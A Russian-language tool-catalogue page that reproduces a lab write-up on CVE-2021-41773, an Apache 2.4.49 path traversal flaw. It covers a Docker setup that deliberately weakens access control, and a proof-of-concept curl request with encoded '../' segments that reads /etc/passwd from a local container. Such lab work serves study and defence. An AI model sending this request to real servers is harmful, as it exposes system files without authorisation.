Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2021-41773 | Kitploit
Инструменты/GitHubGitHub/jiyun02/cve-2021-41773
Анализ уязвимостейЭксплуатацияВеб-безопасностьТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubjiyun02/cve-2021-41773

cve-2021-41773

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-41773 – Apache Path Traversal: отчёт


Краткое описание

  • Уязвимость, обнаруженная в Apache HTTP Server 2.4.49, которая в зависимости от конфигурации веб-сервера может раскрывать конфиденциальные файлы системы через атаку Path Traversal
  • Path Traversal: злоумышленник может получить доступ к файлам за пределами веб-корня, используя пути, содержащие ../

Информация

  • Название уязвимости: CVE-2021-41773
  • Затронутые версии: Apache HTTP Server 2.4.49
  • Тип уязвимости: Path Traversal
  • Наличие официального патча: исправлено в версии 2.4.50 и выше

Настройка лабораторного окружения

  • Базовый образ: 'httpd:2.4.49' (DockerHub)
  • Способ запуска контейнера: Dockerfile + docker-compose.yml
  • Порт: 8080 → подключение к порту 80 контейнера
  • Изменение конфигурации Apache: 'Require all granted' (разрешает Path Traversal)

Как запустить окружение

  • git clone https://github.com/JIYUN02/cve-2021-41773.git
  • cd cve-2021-41773
  • docker-compose up --build

PoC уязвимости

  • curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

Подробный процесс

  1. Подготовка директории для задания image
image
  1. Создание Dockerfile image

-> Базовый образ: httpd:2.4.49 (версия с уязвимостью)

-> 'sed -i 's/Require all denied/Require all granted/g' : разрешение Path Traversal и внешнего доступа

  1. docker-compose.yml image

-> Определение Apache

-> Проброс порта 8080 на порт 80 контейнера

  1. Запуск docker

    image
  2. Выполнение PoC

    image

-> curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

-> /etc/passwd содержит конфиденциальную информацию; %2e — это закодированный вариант .., который означает переход в родительский каталог

-> Манипулируя путём, сервер обращается к /etc/passwd и выводит его содержимое

  1. Результат выполнения image

-> Как показано на изображении выше, возможен доступ к конфиденциальным каталогам


URL репозитория, доступного через Fork

https://github.com/JIYUN02/cve-2021-41773

-> Имеется история коммитов

Скачать инструмент